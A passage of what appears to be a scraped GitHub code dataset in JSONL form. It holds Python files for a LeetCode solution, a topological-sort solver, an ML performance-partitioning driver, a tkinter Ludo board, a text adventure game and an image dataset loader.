'h')\n\n","repo_name":"askenja/jj_complementary","sub_path":"dereddening/application/deredden_green.py","file_name":"deredden_green.py","file_ext":"py","file_size_in_byte":2461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"32535983554","text":"class Solution:\n def thirdMax(self, nums: List[int]) -> int:\n s=set()\n for num in nums:\n if len(s)<3 :\n s.add(num)\n elif num>min(s) and num not in s:\n s.add(num)\n s.remove(min(s))\n \n if len(s)<3:\n return max(s)\n\n return min(s)\n\n # #if the new number is larger than the smallest of smallest\n # #add it to the set and remove the previous\n","repo_name":"kcandost/A2SV.SG","sub_path":"414. Third Maximum Number.py","file_name":"414. 
Third Maximum Number.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"15073313247","text":"import collections\n\n\ndef solution(N, infos):\n graph = collections.defaultdict(list)\n in_degree = [0 for _ in range(N + 1)]\n in_degree[0] = -1\n # 해당 건물을 짓는데 걸리는 시간을 저장하는 변수\n times = [0]\n # 해당 건물을 짓는데 걸리는 총 시간(이전 건물 짓는 시간 포함)을 저장하는 변수\n distances = [0 for _ in range(N + 1)]\n\n # 그래프 구하기 및 in_degree 구하기\n for u in range(N):\n w = infos[u][0]\n times.append(w)\n for i in range(1, len(infos[u]) - 1):\n graph[infos[u][i]].append(u + 1)\n in_degree[u + 1] += 1\n\n # in_degree가 0인 애들을 시작 정점으로설정\n starts = []\n for i in range(1, N + 1):\n if in_degree[i] == 0:\n starts.append(i)\n distances[i] = times[i]\n\n visit = [False for _ in range(N + 1)]\n\n for start in starts:\n Q = collections.deque()\n Q.append(start)\n visit[start] = True\n\n while Q:\n vertex = Q.popleft()\n\n for adjacent in graph[vertex]:\n if not visit[adjacent]:\n in_degree[adjacent] -= 1\n if in_degree[adjacent] <= 0:\n visit[adjacent] = True\n Q.append(adjacent)\n # 해당 건물을 짓는 총 시간은 = max(해당 건물을 짓는 총 시간, 현재 건물을 짓는 총시간 + 해당 건물을 짓는 시간)\n distances[adjacent] = max(distances[adjacent], distances[vertex] + times[adjacent])\n\n for i in range(1, N + 1):\n print(distances[i])\n\n\nN = int(input())\ninfos = [list(map(int, input().split())) for _ in range(N)]\nsolution(N, infos)\n","repo_name":"gudwh14/algorithm","sub_path":"boj/graph/위상정렬 - 게임 개발.py","file_name":"위상정렬 - 게임 개발.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"19908335387","text":"# Main entry point for executing experiments\nimport argparse\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport numpy as np\nimport pandas as pd\nimport pickle\nimport os\nfrom scipy.sparse import load_npz\nfrom sklearn import tree\nfrom tqdm import tqdm\n\nsns.set_theme(style='white', font_scale=1.5)\n\nfrom partition import PerformancePartitioner\n\nimport pdb\n\ndef main():\n parser = argparse.ArgumentParser(description='Experiment Driver')\n parser.add_argument(\n '--outpath',\n default='./experiments/run_bigger_test_set/',\n help='where to save results'\n )\n parser.add_argument(\n '--model_path',\n default='./20220629_model_info/label_HCT_deploy.pkl',\n help='where the model lives'\n )\n parser.add_argument(\n '--label_path',\n default='./20220629_model_info/label_HCT_yhats',\n help='where the test set labels and predictions live'\n )\n parser.add_argument(\n '--feature_path',\n default='./20220629_model_info/test_features.npz',\n help='where the test set features live'\n )\n parser.add_argument(\n '--compare_to_random_partition',\n action='store_true',\n help=('whether to compare PerformancePartioner to random partitioner'\n 'that permutes to which feature vector a (prediction, label) pair' \n 'belongs')\n )\n parser.add_argument(\n '--random_state',\n default=42,\n type=int,\n help=('random seed')\n )\n parser.add_argument(\n '--n_null',\n default=1000,\n type=int,\n help=('size of null distribution')\n )\n args = parser.parse_args()\n np.random.seed(args.random_state)\n\n # Load model and model data\n with open(args.model_path, 'rb') as f:\n model_pkl = pickle.load(f)\n model = model_pkl['model']\n feature_order = model_pkl['feature_order']\n features = load_npz(args.feature_path).toarray()\n hats = pd.read_csv(args.label_path)\n labels = hats['labels']\n predictions = 
hats['predictions']\n\n # Build null distribution\n worst_metrics_null = {'auc' : [], 'accuracy' : [],\n 'average_precision' : [], 'num_groups' : []}\n if args.compare_to_random_partition:\n for i in tqdm(range(args.n_null)):\n indices = [idx for idx in range(len(labels))]\n indices_shuffled = np.random.choice(indices, size=len(indices),\n replace=False)\n labels_random = [labels[idx] for idx in indices_shuffled]\n predictions_random = [predictions[idx] for idx in indices_shuffled]\n clf = tree.DecisionTreeRegressor(min_samples_leaf=2)\n worst_partition = partition_performance(\n attributes=features,\n labels=labels_random,\n predictions=predictions_random,\n clf=clf,\n random_state=args.random_state\n )\n worst_metrics_null['auc'].append(worst_partition['auc'])\n worst_metrics_null['accuracy'].append(worst_partition['accuracy'])\n worst_metrics_null['average_precision'].append(\n worst_partition['average_precision'])\n worst_metrics_null['num_groups'].append(\n worst_partition['num_groups'])\n\n # Get worst performance with with recursive partitioning\n clf = tree.DecisionTreeRegressor(\n min_samples_leaf=2000)\n \n#ccp_alpha=3.329391502327633e-05)\n\n worst_partition = partition_performance(\n attributes=features,\n labels=labels,\n predictions=predictions,\n clf=clf,\n random_state=args.random_state,\n tune=False\n )\n\n # Plot scatter\n metrics = ['scores', 'accuracy', 'auc', 'average_precision', ]\n fig, axs = plt.subplots(1, 4, figsize=(40, 10))\n for i, metric in enumerate(metrics):\n plot_partion_score_vs_metric(worst_partition['ppart'], metric, axs[i])\n os.makedirs(args.outpath, exist_ok=True)\n outfig = os.path.join(args.outpath, '2000_min_sample.png')\n plt.savefig(outfig, bbox_inches='tight', dpi=300)\n\n # Plot actual value againts null distribution\n \n if args.compare_to_random_partition:\n colors = sns.color_palette()\n fig, axs = plt.subplots(1, 4, figsize=(40, 10))\n counter = 0\n for ax, m in zip(axs, worst_metrics_null):\n plot_hist_and_value(value=worst_partition[m],\n null_disrtibution=worst_metrics_null[m],\n ax=ax,\n metric=m,\n color=colors[counter])\n counter += 1\n\n os.makedirs(args.outpath, exist_ok=True)\n outfig = os.path.join(args.outpath, 'compare_to_null.png')\n plt.savefig(outfig, bbox_inches='tight', dpi=300)\n\ndef plot_hist_and_value(value, null_disrtibution, ax, metric, color):\n \"\"\"\n Plots histogram of null distribution and verticl line with actual\n value given a metric and ax\n \"\"\"\n n = len(null_disrtibution)\n pvalue = len([p for p in null_disrtibution if p <= value]) / n\n ax = sns.histplot(x=null_disrtibution,\n bins=20,\n stat='count',\n ax=ax,\n color=color)\n ax.plot([value, value], \n [0, ax.get_ylim()[1]],\n color='black',\n linestyle='--',\n label=f\"Worst Parition auc={round(value, 2)} p < {pvalue}\")\n ax.set_title(f\"Discovered Worst {metric} vs Null Distribution\")\n ax.set_xlabel(f\"Worst {metric}\")\n ax.set_ylabel(\"Count\")\n ax.legend()\n\ndef plot_partion_score_vs_metric(ppart, metric, ax):\n \"\"\"\n Given a fit PerformancePartitioner, plots the predicted scores within\n each partion vs the estimate scores in the parition. 
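Marker colour encodes each partition's label prevalence and marker size\n    scales with that partition's sample count.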
\n \n Args:\n ppart: a fit PerformancePartitioner\n metric: which metric to plot againts fit score, can be 'scores', 'auc',\n 'accuracy', 'average_precision'\n \"\"\" \n colors = sns.color_palette(\"icefire\", as_cmap=True)\n valid_inds = [i for i, val in enumerate((ppart.df_partition_scores[metric]))\n if val != 999]\n prevalences = [int(p * 255) for p in \n ppart.df_partition_scores.prevalance[valid_inds]]\n sizes = ppart.df_partition_scores.n_samples[valid_inds] / \\\n max(ppart.df_partition_scores.n_samples[valid_inds]) * 200\n ax.scatter(ppart.df_partition_scores.predicted_scores[valid_inds],\n ppart.df_partition_scores[metric][valid_inds],\n c=[colors.colors[p] for p in prevalences],\n s=sizes)\n ax.set_title(f'Predicted Errors vs Actual {metric}')\n ax.set_xlabel(\"Fit Scores\")\n ax.set_ylabel(f\"Actual {metric}\")\n\ndef partition_performance(attributes, labels, predictions, clf, \n get_worst_path=False, random_state=42, tune=False):\n \"\"\"\n Performs the feature partioning and returns data for logging \n \"\"\"\n worst_path = None\n ppart = PerformancePartitioner(\n attributes=attributes,\n labels=labels,\n predictions=predictions,\n clf=clf,\n random_state=random_state,\n )\n ppart.partition(tune=tune)\n ppart.evaluate()\n \n # Get partition with worst performance\n worst_partition = ppart.df_partition_scores.sort_values('auc').head(1)\n\n if get_worst_path:\n worst_parition_indices = [int(a) for a in \n worst_partition['samples'].split('-')]\n X_worst_partition = ppart.attributes[worst_parition_indices]\n worst_path = ppart.get_paths_for_sample(\n X_test=X_worst_partition\n )\n \n\n return {\n 'auc': float(worst_partition['auc'].values[0]),\n 'accuracy': float(worst_partition['accuracy'].values[0]),\n 'average_precision': float(\n worst_partition['average_precision'].values[0]),\n 'num_groups' : ppart.num_groups,\n 'worst_path' : worst_path,\n 'ppart' : ppart\n }\n\nif __name__ == '__main__':\n main()\n","repo_name":"HealthRex/CDSS","sub_path":"scripts/model_performance_partitioning/driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":8029,"program_lang":"python","lang":"en","doc_type":"code","stars":84,"dataset":"github-code","pt":"2"} +{"seq_id":"12901275257","text":"import tkinter as tk\nfrom random import randrange\nfrom tkinter import font\n\nfrom configure import *\n\nclass LudoBoard:\n\n def __init__(self, master):\n #master represents parent window set width,height of CANVAS BY REFERENCE OF BOARD CLASS OF SETTING FILE-> OUR LUDO BOARD\n self.canvas = tk.Canvas(master, width=Board.BOARD_WIDTH, height=Board.BOARD_HEIGHT)\n #set \n self.frame = tk.Frame(master, width=Board.PANEL_WIDTH, height=Board.PANEL_HEIGHT, bg=Color.BLUE)\n self.Quit = tk.Button(master, text='QUIT', command=master.quit, relief=tk.RAISED, width=20, height=2,background='red',foreground='white')\n self.title_bar = tk.Label(master, text=Text.HEADER, fg=Color.DEFAULT, bg='black',foreground='blue', font=('Jokerman', 40), relief=tk.RAISED)\n self.status_bar = tk.Label(master, text=Text.MADE_BY, bd=1, relief=tk.SUNKEN)\n\n def draw_rectangle(self, lx, ly, bx, by, color, width):\n self.canvas.create_rectangle(\n lx * Board.SQUARE_SIZE,\n ly * Board.SQUARE_SIZE,\n bx * Board.SQUARE_SIZE,\n by * Board.SQUARE_SIZE,\n fill=color,\n width = width\n )\n\n def draw_polygon(self, x1, y1, x2, y2, color, width):\n self.canvas.create_polygon(\n x1 * Board.SQUARE_SIZE,\n y1 * Board.SQUARE_SIZE,\n Board.BOARD_WIDTH // 2,\n Board.BOARD_HEIGHT // 2,\n x2 * Board.SQUARE_SIZE,\n y2 * Board.SQUARE_SIZE,\n 
fill=color,\n width=width\n )\n\n def draw_circle(self, x1, y1, x2, y2, color):\n self.canvas.create_oval(\n x1 * Board.SQUARE_SIZE,\n y1 * Board.SQUARE_SIZE,\n x2 * Board.SQUARE_SIZE,\n y2 * Board.SQUARE_SIZE,\n fill=color\n )\n\n def path(self):\n\n self.canvas.place(x=30, y=80)\n #winning path of respective home\n for i in range(6, 9):\n for j in range(15):\n if (j not in range(6, 9) and \n i != 7 or j == 0 or j == 14\n ):\n self.draw_rectangle(i + 0.5, j + 0.5, i + 1.5, j + 1.5, '', 1)\n self.draw_rectangle(j + 0.5, i + 0.5, j + 1.5, i + 1.5, '', 1)\n else:\n if j < 6:\n self.draw_rectangle(i + 0.5, j + 0.5, i + 1.5, j + 1.5, Color.YELLOW, 1)\n self.draw_rectangle(j + 0.5, i + 0.5, j + 1.5, i + 1.5, Color.GREEN, 1)\n elif j > 8:\n self.draw_rectangle(i + 0.5, j + 0.5, i + 1.5, j + 1.5, Color.RED, 1)\n self.draw_rectangle(j + 0.5, i + 0.5, j + 1.5, i + 1.5, Color.BLUE, 1)\n\n #HOME SYMBOLS FOR RESPECTIVE HOMEs With Gray Circle \n for i, j in Board.POSITIVE_V:\n if i > j:\n self.draw_rectangle(i + 0.5, j + 0.5, i + 1.5, j + 1.5, Color.YELLOW, 1)\n else:\n self.draw_rectangle(i + 0.5, j + 0.5, i + 1.5, j + 1.5, Color.RED, 1)\n \n self.draw_circle(i + 0.7, j + 0.7, i + 1.3, j + 1.3, Color.GRAY)\n for j, i in Board.POSITIVE_H:\n if i > j:\n self.draw_rectangle(j + 0.5, i + 0.5, j + 1.5, i + 1.5, Color.GREEN, 1)\n else:\n self.draw_rectangle(j + 0.5, i + 0.5, j + 1.5, i + 1.5, Color.BLUE, 1)\n self.draw_circle(j + 0.7, i + 0.7, j + 1.3, i + 1.3, Color.GRAY)\n\n def home(self):\n # SET COLOR AND BORDER FOR OUTER PART OF RESPECTIVE HOME's 1st Region\n for i, j in Board.POINTS:\n\n if i == 0 and j == 0:\n self.draw_rectangle(i*9 + 0.5, j*9 + 0.5, i*9 + 6.5, j*9 + 6.5, Color.GREEN, 3)\n elif i == 0 and j == 1:\n self.draw_rectangle(i*9 + 0.5, j*9 + 0.5, i*9 + 6.5, j*9 + 6.5, Color.RED, 3)\n elif i == 1 and j == 0:\n self.draw_rectangle(i*9 + 0.5, j*9 + 0.5, i*9 + 6.5, j*9 + 6.5, Color.YELLOW, 3)\n else:\n self.draw_rectangle(i*9 + 0.5, j*9 + 0.5, i*9 + 6.5, j*9 + 6.5, Color.BLUE, 3)\n \n self.draw_rectangle(i*9 + 1.25, j*9 + 1.25, i*9 + 5.75, j*9 + 5.75, Color.DEFAULT, 3)\n\n for i, j in Board.POINTS:\n #RESPECTIVE FLAG SIT IN HOME\n if i == 0 and j == 0:\n self.draw_rectangle(i*9 + 1.65, j*9 + 1.65, i*9 + 3.3, j*9 + 3.3, Color.GREEN, 0)\n self.draw_rectangle(i*9 + 3.65, j*9 + 3.65, i*9 + 5.3, j*9 + 5.3, Color.GREEN, 0)\n self.draw_rectangle(i*9 + 1.65, j*9 + 3.65, i*9 + 3.3, j*9 + 5.3, Color.GREEN, 0)\n self.draw_rectangle(i*9 + 3.65, j*9 + 1.65, i*9 + 5.3, j*9 + 3.3, Color.GREEN, 0)\n elif i == 0 and j == 1:\n self.draw_rectangle(i*9 + 1.65, j*9 + 1.65, i*9 + 3.3, j*9 + 3.3, Color.RED, 0)\n self.draw_rectangle(i*9 + 3.65, j*9 + 3.65, i*9 + 5.3, j*9 + 5.3, Color.RED, 0)\n self.draw_rectangle(i*9 + 1.65, j*9 + 3.65, i*9 + 3.3, j*9 + 5.3, Color.RED, 0)\n self.draw_rectangle(i*9 + 3.65, j*9 + 1.65, i*9 + 5.3, j*9 + 3.3, Color.RED, 0)\n elif i == 1 and j == 0:\n self.draw_rectangle(i*9 + 1.65, j*9 + 1.65, i*9 + 3.3, j*9 + 3.3, Color.YELLOW, 0)\n self.draw_rectangle(i*9 + 3.65, j*9 + 3.65, i*9 + 5.3, j*9 + 5.3, Color.YELLOW, 0)\n self.draw_rectangle(i*9 + 1.65, j*9 + 3.65, i*9 + 3.3, j*9 + 5.3, Color.YELLOW, 0)\n self.draw_rectangle(i*9 + 3.65, j*9 + 1.65, i*9 + 5.3, j*9 + 3.3, Color.YELLOW, 0)\n else:\n self.draw_rectangle(i*9 + 1.65, j*9 + 1.65, i*9 + 3.3, j*9 + 3.3, Color.BLUE, 0)\n self.draw_rectangle(i*9 + 3.65, j*9 + 3.65, i*9 + 5.3, j*9 + 5.3, Color.BLUE, 0)\n self.draw_rectangle(i*9 + 1.65, j*9 + 3.65, i*9 + 3.3, j*9 + 5.3, Color.BLUE, 0)\n self.draw_rectangle(i*9 + 3.65, j*9 + 1.65, i*9 + 
5.3, j*9 + 3.3, Color.BLUE, 0)\n\n #RESPECTIVE HOME\"S SPACE IN WINNNING ZONE(TRIANGULAR REGION)\n self.draw_polygon(6.5, 6.5, 6.5, 9.5, Color.GREEN, 1)\n self.draw_polygon(6.5, 6.5, 9.5, 6.5, Color.YELLOW, 1)\n self.draw_polygon(9.5, 9.5, 6.5, 9.5, Color.RED, 1)\n self.draw_polygon(9.5, 9.5, 9.5, 6.5, Color.BLUE, 1)\n\n\n def create_panel(self):\n self.frame.place(x=700, y=100)\n self.Quit.place(x=910, y=620)\n self.title_bar.pack(side=tk.TOP, fill=tk.X)\n self.status_bar.pack(side=tk.BOTTOM, fill=tk.X)\n\n def create(self):\n self.path()\n self.home()\n self.create_panel() \n\n def get_canvas(self):\n return self.canvas\n\n def get_frame(self):\n return self.frame","repo_name":"yash-rao/LUDO","sub_path":"board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":6697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"27526423366","text":"import random\nimport time\n\n# Player Class\nclass Player:\n\n\n def __init__(self, health, stamina, inventory, fur, party):\n self.health = health\n self.stamina = stamina\n self.inventory = inventory\n self.fur = fur\n self.party = party\n\n # Method to allow player to customize fur\n def get_player_fur(self):\n p_fur = {\n \"A\": \"Brown\",\n \"B\": \"White\",\n \"C\": \"Black\",\n }\n get_player_fur = input(\n \"What colour is your fur?\\nA) Brown\\nB) White\\nC) Black \\n\"\n ).upper()\n while get_player_fur not in \"ABC\":\n print(\"Not a valid choice, please select a correct option\")\n get_player_fur = input(\n \"What colour is your fur?\\nA) Brown\\nB) White\\nC) Black \\n\"\n ).upper()\n self.fur = p_fur[get_player_fur]\n\n\n# Function to allow player to chose the direction.\ndef get_player_direction():\n direction = {\n \"A\": \"The armoury\",\n \"B\": \"The dungeon\",\n \"C\": \"The castle\",\n }\n player_direction = input(\n \"Where would you like to go? \\n A) The armoury \\n B) The dungeon \\n C) The Castle\\n\"\n ).upper()\n while player_direction not in \"ABC\":\n print(\"Not a valid choice, please select a correct option\")\n player_direction = input(\n \"Where would you like to go? \\n A) The armoury \\n B) The dungeon \\n C) The Castle \\n\"\n ).upper()\n p_chosen_direction = direction[player_direction]\n\n return p_chosen_direction\n\n\n# The main hub, the village, this function is for the player to get around.\ndef village():\n print(\"You walk into a village close to the castle in the dead of night.\")\n time.sleep(1)\n print(\"To the West there is a shop called 'Yakobs Armoury'.\")\n time.sleep(1)\n print(\n \"To the East there is a sign, with many warnings written in blood. 
The sign says,\\n 'BEWARE\\n The Dungeon of Neverending Torment\\n This way'\"\n )\n time.sleep(4)\n print(\n \"The castle is not too far from here, if you wanted to, you could head there now.\"\n )\n time.sleep(2)\n p_chosen = get_player_direction()\n return p_chosen\n\n\n# Weapon generator\ndef weapon_generator():\n prefix = {\n 1: \"Nemesis\",\n 2: \"Emberling\",\n 3: \"Soulflare\",\n 4: \"Lament\",\n 5: \"Dusksong\",\n 6: \"Dreamshadow\",\n 7: \"Flameward\",\n 8: \"Crucifier\",\n 9: \"Torrent\",\n 10: \"Starlight\",\n }\n\n type_of_wep = {\n 1: \"Sword\",\n 2: \"Axe\",\n 3: \"Hammer\",\n 4: \"Dagger\",\n 5: \"Staff\",\n }\n\n suffix = {\n 1: \"of the shadows\",\n 2: \"of honor\",\n 3: \"of the immortal\",\n 4: \"of the depth\",\n 5: \"of fury\",\n 6: \"of the sun\",\n 7: \"of the claw\",\n 8: \"of the enigma\",\n 9: \"of grace\",\n 10: \"of horrors\",\n }\n\n prefix_choice = random.randint(1, 10)\n type_choice = random.randint(1, 5)\n suffix_choice = random.randint(1, 10)\n weapon = f\"{prefix[prefix_choice]}, {type_of_wep[type_choice]} {suffix[suffix_choice]}\"\n return weapon\n\n\nLevel = 1\n# Begin the adventure\ndef rungame():\n player = Player(\n 100,\n 10,\n [],\n \"Placeholder\",\n [],\n )\n print(\"Welcome to DUNGEONS AND KITTENS\")\n time.sleep(4)\n input(\"press enter to start:\")\n def the_armoury():\n print(\"Welcome to the armoury\")\n stay = int(input(\"Would you like to browse my wares? 1) Yes, 2) No\\n\"))\n wares = []\n for i in range(3):\n wares.append(weapon_generator())\n while stay == 1:\n\n purchase = int(\n input(\n f\"Which would you like, 1) {wares[0]}, 2) {wares[1]}, 3) {wares[2]}, 4) Nothing?\\n\"\n )\n )\n soldout = \"Sold Out\"\n if purchase == 1:\n player.inventory.append(wares[0])\n wares[0] = soldout\n elif purchase == 2:\n player.inventory.append(wares[1])\n wares[1] = soldout\n elif purchase == 3:\n player.inventory.append(wares[2])\n wares[2] = soldout\n elif purchase == 4:\n break\n print(player.inventory)\n stay = int(input(\"Would you like to buy anything else? 
1) Yes, 2) No\\n\"))\n\n\n def the_dungeon():\n global Level\n Level = Level + 1\n\n print(\"You walk into the dungeon\")\n enemy_health = 100\n\n if Level > 1:\n enemy_health = enemy_health * Level\n if Level > 10:\n enemy_health = enemy_health * (Level * 1.5)\n print(f\"You enter level {Level}\")\n time.sleep(1)\n while enemy_health > 0:\n player_damage = random.randint(30, 60) + Level*1.2\n\n if len(player.inventory) > 0:\n if Level == 1:\n player_damage = player_damage + 50\n elif Level > 1:\n player_damage = player_damage + (50 * (Level * 0.6))\n\n print(\n f\"You attack, dealing {player_damage} damage, using {player.inventory[0]}\"\n )\n else:\n print(f\"You attack, dealing {player_damage} damage\")\n time.sleep(2)\n enemy_health = enemy_health - player_damage\n enemy_damage = random.randint(10, 20)\n if Level > 5:\n enemy_damage = random.randint(40, 100)\n elif Level > 10:\n enemy_damage = random.randint(100, 100 + (Level * 1.5))\n if enemy_health > 0:\n print(f\"The enemy attacks, and deals {enemy_damage} damage to you\")\n time.sleep(2)\n player.health = player.health - enemy_damage\n if player.health < 0:\n print(\"You run away from the fight, and retreat to the village to heal\")\n break\n\n print(f\"You have {player.health} hp left, and your enemy has {enemy_health} hp left\")\n \n print(\n \"You return to the village after a deadly battle, knowing where to go next time to get to the next level of the dungeon\"\n )\n time.sleep(2)\n if Level > 0:\n player.health = 100 * Level\n elif Level > 10:\n player.health = player.health + (100 * (Level ^1.2))\n print(f\"You feel stronger, and your health is now {player.health}\")\n time.sleep(3)\n if Level == 10:\n print(\n \"You leave the dungeon with a new weapon, this might be exactly what you need to defeat Cattledoore, 'purrfect whisker of eternal nightmares and damnation jr the third'!\"\n )\n time.sleep(5)\n player.inventory.append(\n \"purrfect whisker of eternal nightmares and damnation jr the third\"\n )\n print(\n \"You now are wielding the 'purrfect whisker of eternal nightmares and damnation jr the third', and can enter the castle.\"\n )\n time.sleep(4)\n\n def the_castle():\n if \"purrfect whisker of eternal nightmares and damnation jr the third\" not in player.inventory:\n print(\n \"You walk into the castle courtyard, and instantly get incinerated by Cattledoore's strong magic!\"\n )\n player.health = 0\n else:\n cattledoore_health = 30000\n while cattledoore_health > 0:\n if len(player.inventory) > 2:\n player_damage = random.randint(50*Level, 55*Level)\n else:\n player_damage = random.randint(25*Level, 30*Level)\n print(f\"You attack Cattledoore, and deal {player_damage}\")\n time.sleep(2)\n cattledoore_health = cattledoore_health - player_damage\n cattledoore_damage = random.randint(0,10)\n if cattledoore_damage == 3:\n print(\"Cattledoore does a super attack, dealing 150 damage.\")\n cattledoore_damage = 150\n player.health = player.health - cattledoore_damage\n print(f\"You are hit for {cattledoore_damage} and have {player.health} hp left\")\n print(\"Cattledoore is killed and you take back the crown. 
The kingdom is saved!\")\n time.sleep(5)\n print(\"Or so you think\")\n time.sleep(1)\n print(\"...\")\n time.sleep(3)\n print(\"Cattledoore awakens and uses the souls of your people to instantly kill you\")\n player.health = 0\n\n\n player.get_player_fur()\n time.sleep(1)\n print(\n f\"You are a prince, with {player.fur} fur, whose castle has been taken over by the most evil, powerful cat-zard, Cattledoore.\\nNow, Cattledoore is in possesion of all the catnip in Catnipdom, so you must go on a quest, to retake your kingdom and help your people, by finding the 'purrfect whisker of eternal nightmares and damnation jr the third'.\"\n )\n time.sleep(6)\n\n while player.health > 0:\n village_choice = village()\n if village_choice == \"The armoury\":\n the_armoury()\n elif village_choice == \"The dungeon\":\n the_dungeon()\n elif village_choice == \"The castle\":\n the_castle()\n\n print(\"You Died!\")\n print(f\"Score: {Level}\")\n\n\nif __name__ == \"__main__\":\n rungame()\n","repo_name":"Nom115/milestone_3","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":9425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"21689411107","text":"\"\"\"@xvdp\nDatasetFolder, classification datset where labels are associate to subfolders\n\n.__getitem__() -> magi.features.Item()\n\n\"\"\"\nfrom typing import Union\nimport os\nimport os.path as osp\nimport torch\nfrom torchvision import transforms as TT\nfrom koreto import Col\n\nfrom magi.features.list_util import list_flatten, list_transpose\n\nfrom .datasets import Dataset_M\nfrom ..features import Item, TypedItem, tolist, list_subset, list_removeall\n\n\nIMG_EXTENSIONS = ('.jpg', '.jpeg', '.png', '.ppm', '.bmp', '.pgm', '.tif', '.tiff', '.webp')\n\nList = Union[tuple, list]\nLooseList = Union[tuple, list, str]\n\n# pylint: disable=no-member\nclass DatasetFolder_M(Dataset_M):\n \"\"\" similar torchvision.datasets.DatasetFolder using Magi methods\n\n Builds list self.samples = [Item(), ...]\n .__getItem__() returns Item()\n\n parses a folder with subfolders\n folder/\n /\n for in arg 'extensions'\n ...\n /\n\n : assigning\n self.classes = [, ..., ]\n self.class_to_idx = {:0, ..., :n}\n\n : if _get_class_names() method implemente\n self.class_names = [, ..., ]\n\n : if arg 'ordered' samples cycle thru classes with 'ordered' num samples per class per cycle\n\n : if arg 'subset', only a subset of the classes is made into dataset\n\n Args\n data_root (str) root directory of dataset\n mode (str [\"\"]) subfolder under which classes are stored, e.g. 
'train', 'val' ...\n name (str [\"\"]) -> self.name = f\"__class__.__name__{name}\"\n subset (list, int [None]) -> returns a subset dataset with classes\n list of foldernames | list of indices | int random set of n folders\n ordered (int [0]) -> if > 0 cycles classes with n 'ordered; elements per class\n extensions (list|str) extensions considered in class folders\n dtype (str [torch.get_default_dtype()])\n device (str [cpu])\n for_display (bool [False]) # augmenters are cloned\n grad (bool [False]) # forces for_display to False, for differentiable augments\n channels (int [3]) | 1,4,None: if None, opens images as stored\n transforms (torchvision.transforms)\n\n \"\"\"\n def __init__(self, data_root=None, mode: str=\"\", name: str=\"\", subset: Union[List, int]=None,\n ordered: int=0, names: list=['image', 'target_index'],\n extensions: LooseList=('.jpg', '.jpeg', '.png', '.ppm', '.bmp', '.pgm', '.tif', '.tiff', '.webp'),\n dtype: Union[str, torch.dtype]=None, device: Union[str, torch.device]=\"cpu\",\n for_display: bool=False, grad: bool=False, channels: int=3, transforms: TT=None):\n\n\n super().__init__(name=name, dtype=dtype, device=device, for_display=for_display, grad=grad,\n channels=channels, transforms=transforms)\n\n data_root = self.get_dataset_path(data_root)\n self.mode = mode\n self.data_root = osp.join(data_root, mode)\n assert osp.isdir(self.data_root), f\"{Col.YB}'{self.data_root}' not found{Col.AU}\"\n\n self.ext = [ext.lower() for ext in tolist(extensions)]\n self.ordered = ordered\n\n self.classes, self.class_to_idx = self._get_classes(self.data_root, subset)\n self.target_names = []\n self._get_target_names() # implement per dataset\n\n # if no classes, remove all class info\n if not self.target_names:\n list_removeall(names, 'target_name')\n if not self.classes:\n list_removeall(names, ['target_folder', 'target_index'])\n\n self.item = self._define_item(names)\n\n self._make_dataset()\n\n def _define_item(self, names=None):\n \"\"\"\n \"\"\"\n if names is None:\n names = ['image', 'target_index']\n self.keep_names = names.copy() # on __getitem__\n if 'filename' not in names:\n names += ['filename']\n\n # names, kind, dtype\n _elems = {'image': ['data_2d', self.dtype, 'HCHW'],\n 'filename': ['path', 'str', None], # filename\n 'image_index': ['id', 'int', None], # image index\n 'target_folder': ['name', 'str', None], # class folder, e.g. n04557648\n 'target_name': ['name', 'str', None], # class name, e.g. 
'water_bottle' # requires self.target_names\n 'target_index': ['id', 'int', None]} # class index\n\n kind = [_elems[name][0] for name in names]\n dtype = [_elems[name][1] for name in names]\n form = [_elems[name][2] for name in names]\n\n return TypedItem(names=names, kind=kind, dtype=dtype, form=form)\n\n def _make_item(self, **kwargs):\n \"\"\"\n Filters kwargs by names defined in self._define_item()\n need to pass the correct items in self._make_dataset()\n \"\"\"\n names = self.item.__dict__['names']\n data = [None]*len(names)\n for i, key in enumerate(names):\n if key in kwargs:\n data[i] = kwargs[key]\n return self.item.spawn(data)\n\n def __getitem__(self, index:str=None) -> Item:\n \"\"\"\n Returns Item(data[index(None)], ...)\n Args:\n index (int): Index if None, randint\n \"\"\"\n index = index if index is not None else torch.randint(0, len(self), (1,)).item()\n item = self.samples[index].deepcopy()\n\n path_idx = item.get_indices(kind=\"path\")[0]\n path_name = item[path_idx] if \"filename\" in self.keep_names else item.pop(path_idx)\n\n item[0] = self.open(path_name)\n item.to_torch(device=self.device)\n\n return item\n\n def __len__(self):\n return len(self.samples)\n\n def _get_classes(self, folder:str=None, subset: Union[List, int]=None) -> tuple:\n \"\"\"\n Returns tuple (classes list, class:index dict).\n Args:\n folder (str) root directory path.\n subset (list | int [None]) subset from classes_names, class_indices, num classes\n \"\"\"\n classes = sorted([d.name for d in os.scandir(folder) if d.is_dir()])\n classes = list_subset(classes, subset)\n # reverse dict\n classes_idx = {classes[i]: i for i in range(len(classes))}\n return classes, classes_idx\n\n def _make_dataset(self) -> None:\n \"\"\" collects images to make dataset\n if list of subfolders, each sub folder becomes a class\n if flatt list, no class information is included\n\n optionally\n can return a dataset ordered (arg, 'ordered' in __init__()) cycling classes\n or a subset of the classes (arg, 'subset' in __init__())\n \"\"\"\n is_file = lambda x: x.is_file() and osp.splitext(x)[-1].lower() in self.ext\n get_files = lambda x: sorted([d.path for d in os.scandir(x) if is_file(d)])\n self.samples = None # delete whatever was there\n\n if not self.classes:\n self.samples = []\n for i, path in enumerate(get_files(self.data_root)):\n self.samples += [self._make_item(filename=path, image_index=i)]\n else:\n i = 0\n samples = []\n for class_id, class_name in enumerate(self.classes):\n class_samples = []\n for _, path in enumerate(get_files(osp.join(self.data_root, class_name))):\n _itemkw = {\"filename\":path, \"image_index\":i, 